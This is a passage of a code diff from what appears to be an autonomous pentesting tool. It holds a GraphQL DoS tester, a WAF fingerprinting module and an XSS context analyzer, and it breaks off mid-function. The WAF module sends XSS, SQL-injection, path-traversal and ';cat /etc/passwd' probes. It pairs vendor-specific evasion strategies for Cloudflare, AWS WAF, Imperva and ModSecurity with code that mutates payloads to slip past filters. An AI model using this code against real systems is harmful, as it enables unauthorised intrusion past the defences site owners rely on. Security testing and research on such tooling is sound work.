        """Check for __schema data in response indicating introspection is enabled.

        Returns (found, confidence, detail).
        """
        if response_status != 200:
            return False, 0.0, None
        flags = re.IGNORECASE | re.DOTALL
        if any(re.search(p, response_body, flags) for p in self._SCHEMA_PATTERNS):
            return True, 0.9, "GraphQL introspection: Full schema exposed via __schema query"
        hits = sum(
            1 for p in self._TYPE_LISTING_PATTERNS
            if re.search(p, response_body, flags)
        )
        if hits >= 2:
            return True, 0.85, "GraphQL introspection: Type schema data exposed"
        # "Did you mean ..." suggestions leak field names even when full
        # introspection is disabled.
        if re.search(r'"(?:message|errors)".*"Did you mean.*"', response_body):
            return True, 0.6, "GraphQL introspection: Field suggestions leak schema information"
        return False, 0.0, None
class GraphqlDosTester(BaseTester):
    """Tester for GraphQL Denial of Service via deeply nested queries"""

    def __init__(self):
        super().__init__()
        self.name = "graphql_dos"

    @staticmethod
    def _looks_nested(payload: str) -> bool:
        # Heuristics for a deliberately deep/expensive query payload.
        return (
            payload.count("{") > 5
            or ("__typename" in payload and payload.count("__typename") > 3)
            or ("fragment" in payload.lower() and "..." in payload)
        )

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict,
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for slow response with deeply nested queries indicating DoS potential.

        Returns (found, confidence, detail).
        """
        elapsed_ms = context.get("response_time_ms", 0)
        nested = self._looks_nested(payload)
        if nested:
            # Extreme slowdown = resource exhaustion confirmed.
            if elapsed_ms > 10000:  # > 10 seconds
                return True, 0.85, f"GraphQL DoS: Deeply nested query caused {elapsed_ms}ms response time"
            if elapsed_ms > 5000:  # > 5 seconds
                return True, 0.7, f"GraphQL DoS: Nested query caused slow response ({elapsed_ms}ms)"
        # Gateway/server timeouts under a nested payload.
        if response_status in (408, 504, 502) and nested:
            return True, 0.8, "GraphQL DoS: Server timeout on deeply nested query"
        # Depth/complexity-limit errors prove nested queries are evaluated.
        limit_error_patterns = (
            r"query.*(?:too complex|too deep|exceeds.*(?:depth|complexity))",
            r"max.*(?:depth|complexity).*(?:exceeded|reached)",
            r"(?:depth|complexity)\s+limit",
            r"query.*(?:cost|weight).*exceeded",
        )
        if any(re.search(p, response_body, re.IGNORECASE) for p in limit_error_patterns):
            return True, 0.5, "GraphQL DoS: Depth/complexity limits exist but confirm nested queries are processed"
        if response_status == 500 and nested:
            return True, 0.65, "GraphQL DoS: Server error on deeply nested query"
        return False, 0.0, None
+533
View File
@@ -0,0 +1,533 @@
"""
NeuroSploit v3 - WAF Detector
WAF fingerprinting, bypass strategy database, and payload adaptation
for autonomous pentesting. Detects 15+ WAF vendors and provides
per-WAF bypass techniques.
"""
import logging
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any
logger = logging.getLogger(__name__)
@dataclass
class WAFMatch:
    """A detected WAF.

    Produced by WAFDetector._check_signatures, one instance per matched
    signature set.
    """
    name: str  # "cloudflare", "aws_waf", etc.
    confidence: float  # 0.0-1.0
    detection_method: str  # "header", "body", "server", "probe"
    evidence: str  # comma-joined matched signature parts, e.g. "header:cf-ray"
@dataclass
class WAFResult:
    """Complete WAF detection result.

    Returned (and cached per host) by WAFDetector.detect().
    """
    detected_wafs: List[WAFMatch] = field(default_factory=list)  # all WAFs seen (passive + probe)
    blocking_patterns: Dict[str, bool] = field(default_factory=dict)  # probe type -> was it blocked?
    recommended_delay: float = 0.1  # suggested inter-request delay (seconds) for the primary WAF
# 15+ WAF signatures
# Each entry maps a WAF name to case-insensitive indicators consumed by
# WAFDetector._check_signatures:
#   "headers": response header names whose presence suggests the WAF (+0.4 each)
#   "body":    substrings searched in the (first 5KB of the) body (+0.3 each)
#   "server":  substrings matched against the Server header (+0.5 each)
WAF_SIGNATURES = {
    "cloudflare": {
        "headers": ["cf-ray", "cf-request-id", "cf-cache-status"],
        "body": ["cloudflare", "ray id:", "error 1020", "error 1015"],
        "server": ["cloudflare"],
    },
    "aws_waf": {
        "headers": ["x-amzn-requestid", "x-amzn-errortype"],
        "body": ["request blocked", "aws waf"],
        "server": ["cloudfront", "amazons3"],
    },
    "akamai": {
        "headers": ["x-akamai-session-info", "akamai-origin-hop"],
        "body": ["akamai", "ghost"],
        "server": ["akamaighost"],
    },
    "imperva": {
        "headers": ["x-iinfo", "x-cdn"],
        "body": ["imperva", "incapsula incident", "incapsula"],
        "server": ["imperva"],
    },
    "modsecurity": {
        "headers": ["x-denied-reason", "x-modsecurity"],
        "body": ["mod_security", "modsecurity", "noyb"],
        "server": [],
    },
    "f5_bigip": {
        "headers": ["x-waf-status", "x-cnection"],
        "body": ["the requested url was rejected"],
        "server": ["big-ip", "bigip", "f5"],
    },
    "sucuri": {
        "headers": ["x-sucuri-id", "x-sucuri-cache"],
        "body": ["sucuri", "sucuri website firewall", "cloudproxy"],
        "server": ["sucuri"],
    },
    "barracuda": {
        "headers": ["barra_counter_session"],
        "body": ["barracuda", "barracuda networks"],
        "server": [],
    },
    "fortinet": {
        "headers": ["x-fw-server"],
        "body": ["fortigate", "fortiweb", "fortinet"],
        "server": ["fortiweb"],
    },
    "citrix": {
        "headers": ["citrix-transactionid", "cneonction", "nncoection"],
        "body": ["citrix", "netscaler appfw"],
        "server": ["netscaler"],
    },
    "azure_waf": {
        "headers": ["x-azure-ref", "x-ms-forbidden-ip"],
        "body": ["azure application gateway", "azure front door"],
        "server": ["microsoft-azure-application-gateway"],
    },
    "gcp_armor": {
        "headers": ["x-cloud-trace-context"],
        "body": ["google cloud armor", "forbidden by security policy"],
        "server": ["google frontend", "gfe"],
    },
    "wordfence": {
        "headers": [],
        "body": ["wordfence", "generated by wordfence", "this response was generated by wordfence"],
        "server": [],
    },
    "cloudfront": {
        "headers": ["x-amz-cf-id", "x-amz-cf-pop"],
        "body": ["cloudfront", "error from cloudfront"],
        "server": ["cloudfront"],
    },
    "fastly": {
        "headers": ["x-fastly-request-id", "fastly-restarts"],
        "body": ["fastly error"],
        "server": ["fastly"],
    },
    "reblaze": {
        "headers": ["rbzid"],
        "body": ["reblaze", "access denied (rbz)"],
        "server": ["reblaze"],
    },
}
# Bypass strategies per WAF
# Keys are WAF names (see WAF_SIGNATURES); "generic" is the fallback used by
# WAFDetector.get_bypass_strategy for unknown WAFs. Per-WAF:
#   "xss"/"sqli": technique names understood by WAFDetector._apply_technique
#   "general":    request "delay" (seconds) and optional extra "headers"
BYPASS_STRATEGIES = {
    "cloudflare": {
        "xss": [
            "unicode_escape",  # \u003cscript\u003e
            "svg_payload",  # <svg onload=...>
            "comment_injection",  # <scr<!---->ipt>
            "case_mixing",  # <ScRiPt>
            "html_entity",  # &#x3c;script&#x3e;
        ],
        "sqli": [
            "inline_comment",  # /*!50000UNION*/
            "case_mixing",  # uNiOn SeLeCt
            "whitespace_variant",  # UNION%0bSELECT
            "scientific_notation",  # 1e0UNION
        ],
        "general": {
            "delay": 0.3,
            "headers": {"X-Forwarded-For": "127.0.0.1"},
        },
    },
    "modsecurity": {
        "xss": [
            "inline_comment",
            "case_mixing",
            "whitespace_variant",
            "null_byte",
        ],
        "sqli": [
            "inline_comment",  # /*!50000OR*/
            "case_mixing",
            "double_encoding",  # %2527
            "whitespace_variant",  # tab, newline, %0a
        ],
        "general": {
            "delay": 0.2,
        },
    },
    "aws_waf": {
        "xss": [
            "double_encoding",
            "null_byte",
            "unicode_escape",
            "svg_payload",
        ],
        "sqli": [
            "double_encoding",  # %253C = <
            "null_byte",  # \x00
            "scientific_notation",  # 1e0=1
            "concat_function",  # CONCAT(0x27,...)
        ],
        "general": {
            "delay": 0.2,
        },
    },
    "imperva": {
        "xss": [
            "unicode_escape",
            "html_entity",
            "svg_payload",
            "comment_injection",
        ],
        "sqli": [
            "inline_comment",
            "hex_encoding",
            "whitespace_variant",
        ],
        "general": {
            "delay": 0.5,
        },
    },
    "generic": {
        "xss": [
            "case_mixing",
            "unicode_escape",
            "svg_payload",
            "html_entity",
        ],
        "sqli": [
            "inline_comment",
            "case_mixing",
            "whitespace_variant",
        ],
        "general": {
            "delay": 0.3,
            "headers": {"X-Forwarded-For": "127.0.0.1"},
        },
    },
}
class WAFDetector:
    """WAF fingerprinting and bypass strategy engine.
    Usage:
        detector = WAFDetector(request_engine)
        result = await detector.detect(url)
        if result.detected_wafs:
            adapted = detector.adapt_payload(payload, waf_name, vuln_type)
    """
    # Probe payloads that trigger WAF responses
    PROBE_PAYLOADS = {
        "xss": "<script>alert(1)</script>",
        "sqli": "' OR 1=1--",
        "lfi": "../../etc/passwd",
        "rce": ";cat /etc/passwd",
    }
    def __init__(self, request_engine=None):
        # request_engine: async HTTP client exposing `await request(url, method=...)`.
        # When None, detect() performs no passive or active checks.
        self.request_engine = request_engine
        self._cache: Dict[str, WAFResult] = {}  # url -> result
    async def detect(self, url: str) -> WAFResult:
        """Detect WAFs on the target URL.
        Phase 1: Passive detection (headers/body from normal response)
        Phase 2: Active probing (send trigger payloads, analyze blocks)
        Results are cached per host, so repeated calls for the same host
        return the first result without new requests.
        """
        from urllib.parse import urlparse
        host = urlparse(url).netloc
        if host in self._cache:
            return self._cache[host]
        detected: List[WAFMatch] = []
        blocking: Dict[str, bool] = {}
        # Phase 1: Passive detection from baseline request
        if self.request_engine:
            try:
                result = await self.request_engine.request(url, method="GET")
                if result:
                    passive_wafs = self._check_signatures(
                        result.headers, result.body, result.status
                    )
                    detected.extend(passive_wafs)
            except Exception as e:
                logger.debug(f"WAF passive detection error: {e}")
        # Phase 2: Active probing (only if request engine available)
        if self.request_engine:
            for probe_type, payload in self.PROBE_PAYLOADS.items():
                try:
                    # Raw (unencoded) payload in the query string on purpose:
                    # the goal is to trip the WAF, not to be well-formed.
                    probe_url = f"{url}?test={payload}"
                    result = await self.request_engine.request(
                        probe_url, method="GET"
                    )
                    if result:
                        # Block-style status codes mean the probe was filtered.
                        if result.status in (403, 406, 429, 501):
                            blocking[probe_type] = True
                            # Block pages often carry vendor fingerprints too.
                            probe_wafs = self._check_signatures(
                                result.headers, result.body, result.status
                            )
                            for w in probe_wafs:
                                if not any(d.name == w.name for d in detected):
                                    w.detection_method = "probe"
                                    detected.append(w)
                        else:
                            blocking[probe_type] = False
                except Exception:
                    pass
        # Determine recommended delay
        delay = 0.1
        if detected:
            primary_waf = detected[0].name
            strategy = BYPASS_STRATEGIES.get(primary_waf, BYPASS_STRATEGIES["generic"])
            delay = strategy.get("general", {}).get("delay", 0.3)
        waf_result = WAFResult(
            detected_wafs=detected,
            blocking_patterns=blocking,
            recommended_delay=delay,
        )
        self._cache[host] = waf_result
        if detected:
            waf_names = ", ".join(f"{w.name}({w.confidence:.0%})" for w in detected)
            logger.info(f"WAF detected on {host}: {waf_names}")
        return waf_result
    def _check_signatures(
        self,
        headers: Dict[str, str],
        body: str,
        status: int,
    ) -> List[WAFMatch]:
        """Check response against WAF signature database.

        Returns matches sorted by descending confidence. Weights: header hit
        +0.4, body hit +0.3, Server-header hit +0.5, capped at 1.0.
        """
        matches = []
        headers_lower = {k.lower(): v.lower() for k, v in headers.items()}
        # Only scan the start of the body; block pages are short.
        body_lower = (body or "").lower()[:5000]
        server = headers_lower.get("server", "")
        for waf_name, sigs in WAF_SIGNATURES.items():
            evidence_parts = []
            confidence = 0.0
            # Check headers
            for h in sigs.get("headers", []):
                if h.lower() in headers_lower:
                    evidence_parts.append(f"header:{h}")
                    confidence += 0.4
            # Check body
            for b in sigs.get("body", []):
                if b.lower() in body_lower:
                    evidence_parts.append(f"body:{b}")
                    confidence += 0.3
            # Check server header
            for s in sigs.get("server", []):
                if s.lower() in server:
                    evidence_parts.append(f"server:{s}")
                    confidence += 0.5
            if evidence_parts:
                confidence = min(1.0, confidence)
                matches.append(WAFMatch(
                    name=waf_name,
                    confidence=confidence,
                    detection_method="header" if any("header:" in e for e in evidence_parts) else "body",
                    evidence=", ".join(evidence_parts),
                ))
        # Sort by confidence
        matches.sort(key=lambda m: m.confidence, reverse=True)
        return matches
    def get_bypass_strategy(self, waf_name: str, vuln_type: str) -> Dict:
        """Get bypass strategy for a specific WAF + vuln type combination.

        Returns {"techniques": [...], "delay": float, "extra_headers": dict};
        unknown WAFs fall back to the "generic" strategy.
        """
        strategies = BYPASS_STRATEGIES.get(waf_name, BYPASS_STRATEGIES["generic"])
        # Normalize vuln type to category
        category = self._vuln_to_category(vuln_type)
        techniques = strategies.get(category, strategies.get("xss", []))
        general = strategies.get("general", {})
        return {
            "techniques": techniques,
            "delay": general.get("delay", 0.3),
            "extra_headers": general.get("headers", {}),
        }
    def adapt_payload(
        self, payload: str, waf_name: str, vuln_type: str
    ) -> List[str]:
        """Generate bypass variants of a payload for a specific WAF.
        Returns up to 8 unique adapted payloads. The original payload is
        NOT included in the list; callers should fall back to it themselves.
        """
        strategy = self.get_bypass_strategy(waf_name, vuln_type)
        adapted = []
        for technique in strategy.get("techniques", []):
            variant = self._apply_technique(payload, technique, vuln_type)
            if variant and variant != payload:
                adapted.append(variant)
        # Deduplicate while preserving order
        seen = set()
        unique = []
        for p in adapted:
            if p not in seen:
                seen.add(p)
                unique.append(p)
        return unique[:8]  # Max 8 variants
    def _vuln_to_category(self, vuln_type: str) -> str:
        """Map specific vuln type to WAF bypass category ("sqli" or "xss")."""
        sqli_types = {"sqli_error", "sqli_blind", "sqli_union", "sqli_time",
                      "sqli", "nosql_injection"}
        xss_types = {"xss_reflected", "xss_stored", "xss_dom", "xss"}
        if vuln_type in sqli_types:
            return "sqli"
        if vuln_type in xss_types:
            return "xss"
        return "xss"  # Default category
    def _apply_technique(self, payload: str, technique: str, vuln_type: str) -> Optional[str]:
        """Apply a specific bypass technique to a payload.

        Returns the transformed payload, or None for unknown techniques or
        any transformation error (errors are deliberately swallowed so one
        bad technique never aborts payload adaptation).
        """
        try:
            if technique == "unicode_escape":
                return self._unicode_escape(payload)
            elif technique == "case_mixing":
                return self._case_mix(payload)
            elif technique == "double_encoding":
                return self._double_encode(payload)
            elif technique == "null_byte":
                return self._null_byte(payload)
            elif technique == "comment_injection":
                return self._comment_inject(payload)
            elif technique == "inline_comment":
                return self._inline_comment(payload)
            elif technique == "whitespace_variant":
                return self._whitespace_variant(payload)
            elif technique == "svg_payload":
                return self._svg_variant(payload)
            elif technique == "html_entity":
                return self._html_entity(payload)
            elif technique == "scientific_notation":
                return self._scientific_notation(payload)
            elif technique == "hex_encoding":
                return self._hex_encode(payload)
            elif technique == "concat_function":
                return self._concat_function(payload)
        except Exception:
            pass
        return None
    # --- Bypass technique implementations ---
    def _unicode_escape(self, payload: str) -> str:
        """Replace key characters with unicode escapes."""
        replacements = {
            "<": "\\u003c", ">": "\\u003e", "'": "\\u0027",
            '"': "\\u0022", "/": "\\u002f",
        }
        result = payload
        for old, new in replacements.items():
            result = result.replace(old, new)
        return result
    def _case_mix(self, payload: str) -> str:
        """Alternate case: <ScRiPt>, uNiOn SeLeCt."""
        result = []
        upper = True
        for c in payload:
            if c.isalpha():
                result.append(c.upper() if upper else c.lower())
                # Only alphabetic characters flip the toggle, so case
                # alternation survives punctuation/digits.
                upper = not upper
            else:
                result.append(c)
        return "".join(result)
    def _double_encode(self, payload: str) -> str:
        """Double URL-encode special characters."""
        import urllib.parse
        # First encode
        encoded = urllib.parse.quote(payload, safe="")
        # Encode the % signs
        return encoded.replace("%", "%25")
    def _null_byte(self, payload: str) -> str:
        """Insert null bytes before key characters."""
        return payload.replace("<", "%00<").replace("'", "%00'").replace('"', '%00"')
    def _comment_inject(self, payload: str) -> str:
        """Inject HTML comments into tags."""
        # <script> -> <scr<!---->ipt>
        payload = payload.replace("<script>", "<scr<!---->ipt>")
        payload = payload.replace("</script>", "</scr<!---->ipt>")
        return payload
    def _inline_comment(self, payload: str) -> str:
        """SQL inline comment bypass: UNION -> /*!50000UNION*/"""
        keywords = ["UNION", "SELECT", "OR", "AND", "FROM", "WHERE"]
        result = payload
        for kw in keywords:
            result = re.sub(
                rf'\b{kw}\b',
                f'/*!50000{kw}*/',
                result,
                flags=re.IGNORECASE
            )
        return result
    def _whitespace_variant(self, payload: str) -> str:
        """Replace spaces with alternative whitespace.

        Only the first two spaces are replaced (with %09 and %0a); the rest
        of the payload is left untouched.
        """
        alternatives = ["%09", "%0a", "%0b", "%0c", "%0d", "%a0"]
        result = payload
        for alt in alternatives[:2]:
            result = result.replace(" ", alt, 1)
        return result
    def _svg_variant(self, payload: str) -> str:
        """Convert XSS to SVG-based payload."""
        # Extract the JS code if possible
        match = re.search(r'(?:alert|confirm|prompt)\([^)]*\)', payload)
        if match:
            js_code = match.group(0)
            return f'<svg onload="{js_code}">'
        return '<svg/onload=alert(1)>'
    def _html_entity(self, payload: str) -> str:
        """Encode with HTML entities."""
        replacements = {
            "<": "&#60;", ">": "&#62;", "'": "&#39;",
            '"': "&#34;", "/": "&#47;",
        }
        result = payload
        for old, new in replacements.items():
            result = result.replace(old, new)
        return result
    def _scientific_notation(self, payload: str) -> str:
        """Use scientific notation for SQL: 1 OR -> 1e0OR"""
        return re.sub(r'(\d+)\s+(OR|AND|UNION)', r'\1e0\2', payload, flags=re.IGNORECASE)
    def _hex_encode(self, payload: str) -> str:
        """Hex-encode string literals in SQL."""
        def to_hex(match):
            s = match.group(1)
            hex_str = "0x" + s.encode().hex()
            return hex_str
        return re.sub(r"'([^']+)'", to_hex, payload)
    def _concat_function(self, payload: str) -> str:
        """Use CONCAT() to build strings."""
        def concat_str(match):
            s = match.group(1)
            chars = ",".join(f"CHAR({ord(c)})" for c in s)
            return f"CONCAT({chars})"
        return re.sub(r"'([^']+)'", concat_str, payload)
+444
View File
@@ -0,0 +1,444 @@
"""
NeuroSploit v3 - XSS Context Analyzer
Determines whether a payload reflected in HTML is in an executable position
(auto-executing, interactive, or non-executable text content).
Used by XSS testers and response verifier for context-aware validation.
"""
import re
from typing import Dict, Optional
# Auto-executing events (fire without user interaction)
AUTO_FIRE_EVENTS = {
    "onload", "onerror", "onabort", "onbegin", "onend", "onanimationend",
    "onanimationstart", "ontransitionend", "onhashchange", "onpageshow",
    "onpopstate", "onresize", "onscroll", "onstorage", "onunload",
    "ontoggle",  # when paired with <details open>
}
# Interactive events (require user action)
INTERACTIVE_EVENTS = {
    "onclick", "ondblclick", "onmousedown", "onmouseup", "onmouseover",
    "onmousemove", "onmouseout", "onmouseenter", "onmouseleave",
    "onkeypress", "onkeydown", "onkeyup", "onfocus", "onblur",
    "onchange", "onsubmit", "onreset", "onselect", "oninput",
    "oncontextmenu", "oncopy", "oncut", "onpaste", "ondrag", "ondrop",
    "onpointerdown", "onpointerup", "onpointerover", "onpointermove",
    "ontouchstart", "ontouchend", "ontouchmove", "onfocusin", "onfocusout",
    "onauxclick", "onsearch",
}
# Union of both classes; scanned when checking attribute-breakout payloads.
ALL_EVENTS = AUTO_FIRE_EVENTS | INTERACTIVE_EVENTS
# Tags that auto-fire events.
# Values: True = tag content executes by itself (<script>); a set = events
# that auto-fire on that tag; an empty set = the tag alone does not auto-fire.
AUTO_FIRE_TAGS = {
    "script": True,  # auto-executes content
    "img": {"onerror"},
    "video": {"onerror"},
    "audio": {"onerror"},
    "source": {"onerror"},
    "object": {"onerror"},
    "embed": {"onerror"},
    "body": {"onload"},
    "svg": {"onload"},
    "math": set(),
    "input": {"onfocus"},  # with autofocus
    "select": {"onfocus"},
    "textarea": {"onfocus"},
    "details": {"ontoggle"},  # with open attribute
}
# Safe containers that suppress execution
SAFE_CONTAINERS = {"textarea", "title", "noscript", "xmp", "plaintext", "listing"}
# Pattern to find the innermost enclosing tag
# (a complete <tag ...> with no later '<' before the end of the scanned text)
_RE_BEFORE_TAG = re.compile(r'<(\w+)(?:\s[^>]*)?>(?=[^<]*$)', re.IGNORECASE)
_RE_OPEN_SCRIPT = re.compile(r'<script\b[^>]*>', re.IGNORECASE)  # opening <script ...>
_RE_CLOSE_SCRIPT = re.compile(r'</script\b', re.IGNORECASE)  # closing </script
_RE_COMMENT_OPEN = re.compile(r'<!--(?!.*-->)', re.DOTALL)  # comment opener with no closer ahead
_RE_STYLE_OPEN = re.compile(r'<style\b[^>]*>', re.IGNORECASE)
_RE_STYLE_CLOSE = re.compile(r'</style\b', re.IGNORECASE)
_RE_EVENT_ATTR = re.compile(r'(on\w+)\s*=\s*["\']?', re.IGNORECASE)  # on*= attribute; captures the event name
_RE_JS_URI = re.compile(r'(?:href|src|action|formaction)\s*=\s*["\']?\s*javascript:', re.IGNORECASE)
def analyze_xss_execution_context(
    html_body: str,
    payload: str,
    payload_lower: Optional[str] = None,
) -> Dict:
    """
    Determine whether a payload reflected in HTML is in an executable position.

    Cleanups vs. previous revision: removed unused locals (`after_lower`,
    `full_attr`, `full_attr_lower`) and a stray `f` prefix on a
    placeholder-free string; behavior is unchanged.

    Args:
        html_body: Full HTML response body to inspect.
        payload: The reflected payload to locate and classify.
        payload_lower: Optional pre-lowercased payload (computed if omitted).

    Returns:
        {
            "executable": bool,   # True if payload can auto-execute (no user action)
            "interactive": bool,  # True if payload executes WITH user interaction
            "context": str,       # Context identifier
            "confidence": float,  # 0.0 - 1.0
            "detail": str,        # Human-readable explanation
        }
    """
    result = {
        "executable": False,
        "interactive": False,
        "context": "not_found",
        "confidence": 0.0,
        "detail": "Payload not found in response",
    }
    if not html_body or not payload:
        return result
    if payload_lower is None:
        payload_lower = payload.lower()
    body_lower = html_body.lower()
    # Find payload position (try exact first, then case-insensitive)
    pos = html_body.find(payload)
    if pos == -1:
        pos = body_lower.find(payload_lower)
    if pos == -1:
        return result
    # Extract surrounding context (300 chars before, 150 after)
    before_start = max(0, pos - 300)
    after_end = min(len(html_body), pos + len(payload) + 150)
    before = html_body[before_start:pos]
    after = html_body[pos + len(payload):after_end]
    before_lower = before.lower()
    # Check for HTML encoding of the payload
    encoded_payload = payload.replace("<", "&lt;").replace(">", "&gt;")
    if encoded_payload != payload and encoded_payload in html_body:
        # The payload appears HTML-encoded
        result.update({
            "context": "encoded",
            "confidence": 0.1,
            "detail": "Payload appears HTML-encoded (&lt;/&gt;)",
        })
        return result
    # --- Check 1: Inside HTML comment ---
    # An unclosed <!-- before the payload means we're commented out.
    if "<!--" in before and "-->" not in before[before.rfind("<!--"):]:
        result.update({
            "context": "html_comment",
            "confidence": 0.1,
            "detail": "Payload inside HTML comment",
        })
        return result
    # --- Check 2: Inside <script> tag ---
    script_opens = list(_RE_OPEN_SCRIPT.finditer(before))
    script_closes = list(_RE_CLOSE_SCRIPT.finditer(before))
    if script_opens:
        last_open = script_opens[-1].end()
        last_close = script_closes[-1].start() if script_closes else -1
        if last_open > last_close:
            # We're inside a <script> block
            # Check if payload breaks out of a JS string
            if _payload_breaks_js_string(before[last_open:], payload):
                result.update({
                    "executable": True,
                    "context": "script_breakout",
                    "confidence": 0.95,
                    "detail": "Payload breaks out of JS string inside <script> tag",
                })
                return result
            # Check if payload introduces new code (not just a data value)
            if any(kw in payload_lower for kw in ["alert(", "confirm(", "prompt(", "eval(", "function(", "document.", "window."]):
                result.update({
                    "executable": True,
                    "context": "script_body",
                    "confidence": 0.90,
                    "detail": "Payload with JS execution inside <script> tag",
                })
                return result
            result.update({
                "executable": True,
                "context": "script_body",
                "confidence": 0.85,
                "detail": "Payload inside <script> tag",
            })
            return result
    # --- Check 3: Inside <style> tag (safe) ---
    style_opens = list(_RE_STYLE_OPEN.finditer(before_lower))
    style_closes = list(_RE_STYLE_CLOSE.finditer(before_lower))
    if style_opens:
        last_open = style_opens[-1].end()
        last_close = style_closes[-1].start() if style_closes else -1
        if last_open > last_close:
            result.update({
                "context": "safe_container",
                "confidence": 0.1,
                "detail": "Payload inside <style> tag",
            })
            return result
    # --- Check 4: Inside a safe container ---
    for container in SAFE_CONTAINERS:
        open_pat = f"<{container}"
        close_pat = f"</{container}"
        if open_pat in before_lower:
            last_open = before_lower.rfind(open_pat)
            last_close = before_lower.rfind(close_pat)
            if last_open > last_close:
                result.update({
                    "context": "safe_container",
                    "confidence": 0.1,
                    "detail": f"Payload inside <{container}> (safe container)",
                })
                return result
    # --- Check 5: Payload itself introduces a new HTML tag ---
    if "<" in payload:
        return _analyze_injected_tag(payload, payload_lower, result)
    # --- Check 6: Determine if we're inside an HTML tag (attributes) or text content ---
    # Find the last `<` in `before` and check if there's a `>` after it
    last_lt = before.rfind("<")
    in_tag = False
    tag_name = ""
    tag_region_before = ""
    if last_lt >= 0:
        # Text between last < and payload position
        tag_region_before = before[last_lt:]
        # If no > after the last <, we're inside an open tag (attribute region)
        if ">" not in tag_region_before:
            in_tag = True
            # Extract tag name
            tm = re.match(r'<(\w+)', tag_region_before)
            if tm:
                tag_name = tm.group(1).lower()
    if in_tag and tag_name:
        # We're inside a tag's attribute region; capture the rest of the tag
        # (up to the closing >) for autofocus detection below.
        first_gt = after.find(">")
        after_to_close = after[:first_gt] if first_gt >= 0 else after
        # Check if payload is the VALUE of an event handler attribute
        # Look for on*= patterns in the text BEFORE the payload (within the tag)
        before_in_tag = tag_region_before.lower()
        for m in _RE_EVENT_ATTR.finditer(before_in_tag):
            event_name = m.group(1).lower()
            # This event is BEFORE the payload — payload is (part of) its value
            if event_name in AUTO_FIRE_EVENTS:
                result.update({
                    "executable": True,
                    "interactive": False,
                    "context": "event_handler_auto",
                    "confidence": 0.95,
                    "detail": f"Payload is value of auto-firing event '{event_name}' on <{tag_name}>",
                })
                return result
            elif event_name in INTERACTIVE_EVENTS:
                result.update({
                    "executable": False,
                    "interactive": True,
                    "context": "event_handler",
                    "confidence": 0.90,
                    "detail": f"Payload is value of interactive event '{event_name}' on <{tag_name}> (requires user action)",
                })
                return result
        # Check if we're inside a javascript: URI attribute
        if _RE_JS_URI.search(before_in_tag):
            result.update({
                "executable": False,
                "interactive": True,
                "context": "javascript_uri",
                "confidence": 0.90,
                "detail": f"Payload inside javascript: URI on <{tag_name}>",
            })
            return result
        # Check if payload creates an event handler via attribute breakout
        if _payload_creates_event(payload_lower):
            # Check if autofocus is also present (makes onfocus auto-fire)
            combined = (payload_lower + after_to_close.lower())
            has_autofocus = "autofocus" in combined
            for evt in ALL_EVENTS:
                pat = rf'{evt}\s*='
                if re.search(pat, payload_lower):
                    if evt == "onfocus" and has_autofocus:
                        result.update({
                            "executable": True,
                            "interactive": False,
                            "context": "attribute_breakout_auto",
                            "confidence": 0.95,
                            "detail": f"Payload breaks attribute to create {evt}+autofocus on <{tag_name}> (auto-fires)",
                        })
                        return result
                    elif evt in AUTO_FIRE_EVENTS:
                        result.update({
                            "executable": True,
                            "interactive": False,
                            "context": "attribute_breakout_auto",
                            "confidence": 0.90,
                            "detail": f"Payload breaks attribute to create auto-firing {evt} on <{tag_name}>",
                        })
                        return result
                    else:
                        result.update({
                            "executable": False,
                            "interactive": True,
                            "context": "attribute_breakout_event",
                            "confidence": 0.90,
                            "detail": f"Payload breaks attribute to create {evt} on <{tag_name}> (requires interaction)",
                        })
                        return result
        # Inside a regular attribute value (not event handler, not JS URI)
        result.update({
            "context": "attribute_value",
            "confidence": 0.3,
            "detail": f"Payload inside non-event attribute of <{tag_name}>",
        })
        return result
    # --- Check 7: Payload contains event handler patterns but is in text content ---
    # (e.g., "onclick=alert(1)" as literal text, NOT inside a tag)
    # This is NOT executable — it's just text
    # --- Check 8: Plain text content ---
    result.update({
        "context": "text_content",
        "confidence": 0.2,
        "detail": "Payload reflected as plain text content in HTML body",
    })
    return result
def _payload_breaks_js_string(js_before: str, payload: str) -> bool:
"""Check if payload breaks out of a JS string context."""
# Look for string delimiters just before payload
stripped = js_before.rstrip()
if not stripped:
return False
# Payload starts with string terminator + code
p = payload.lstrip()
if p and p[0] in ("'", '"', '`'):
return True
# Payload contains </script>
if "</script>" in payload.lower():
return True
return False
def _payload_creates_event(payload_lower: str) -> bool:
    """Check if payload string creates an event handler (attribute breakout)."""
    # Cheap pre-filter: an event attribute assignment always needs an '='
    if "=" not in payload_lower:
        return False
    # e.g. " onfocus=alert(1) autofocus x="
    return any(
        evt in payload_lower and re.search(rf'{evt}\s*=', payload_lower)
        for evt in ALL_EVENTS
    )
def _analyze_injected_tag(payload: str, payload_lower: str, result: Dict) -> Dict:
    """Analyze a payload that introduces new HTML tags.

    Classifies the injected markup into one of several contexts
    (script tag, auto-firing event, interactive event, javascript: URI,
    or inert tag) and updates ``result`` in place.

    Args:
        payload: Raw payload as reflected (kept for signature compatibility).
        payload_lower: Lowercased copy of the payload, precomputed by caller.
        result: Mutable result dict; updated with ``executable``,
            ``interactive``, ``context``, ``confidence`` and ``detail`` keys.

    Returns:
        The same ``result`` dict, updated.
    """
    # Extract tag names introduced by the payload
    tags = re.findall(r'<(\w+)', payload_lower)
    if not tags:
        result.update({
            "context": "text_content",
            "confidence": 0.3,
            "detail": "Payload contains < but no recognizable tags",
        })
        return result
    primary_tag = tags[0]
    # <script> tag = auto-execute
    if "script" in tags:
        result.update({
            "executable": True,
            "context": "injected_script_tag",
            "confidence": 0.95,
            # NOTE(review): "interactive" is left at result's preexisting value here
            "detail": "Payload injects <script> tag",
        })
        return result
    # Collect event handler attributes present in the payload
    events_in_payload = {m.group(1).lower() for m in _RE_EVENT_ATTR.finditer(payload_lower)}
    auto_events = events_in_payload & AUTO_FIRE_EVENTS
    interactive_events = events_in_payload & INTERACTIVE_EVENTS
    # autofocus promotes onfocus to auto-firing
    if "autofocus" in payload_lower and "onfocus" in events_in_payload:
        auto_events.add("onfocus")
        interactive_events.discard("onfocus")
    # <details open ontoggle> fires ontoggle automatically
    if "details" in tags and "open" in payload_lower and "ontoggle" in events_in_payload:
        auto_events.add("ontoggle")
        interactive_events.discard("ontoggle")
    # img/video/audio/... with src + onerror auto-fires when the src fails to load
    if primary_tag in ("img", "video", "audio", "source", "object", "embed", "input"):
